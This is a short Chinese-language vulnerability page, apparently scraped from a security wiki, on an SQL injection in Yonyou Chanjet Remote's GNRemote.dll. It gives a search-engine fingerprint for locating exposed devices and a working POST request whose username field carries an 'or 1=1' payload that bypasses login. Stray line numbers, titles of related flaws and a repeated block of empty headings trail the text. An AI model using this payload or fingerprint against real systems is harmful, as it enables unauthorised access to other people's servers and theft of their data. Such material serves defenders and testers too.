# 用友畅捷通远程通 GNRemote.dll SQL注入漏洞

# 漏洞描述

用友畅捷通远程通 GNRemote.dll SQL注入漏洞，攻击者通过SQL注入可以获取服务器敏感信息或者使用万能密码登录设备

# 漏洞影响

用友畅捷通远程通

# 网络测绘

body="远程通CHANJET_Remote"

# 漏洞复现

登录页面

验证POC

POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl

username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1

1
2
3

用友畅捷通T+ Upload.aspx 任意文件上传漏洞用友畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞

# 用友 畅捷通远程通 GNRemote.dll SQL注入漏洞

# 漏洞描述

# 漏洞影响

# 网络测绘

# 漏洞复现

# 用友畅捷通远程通 GNRemote.dll SQL注入漏洞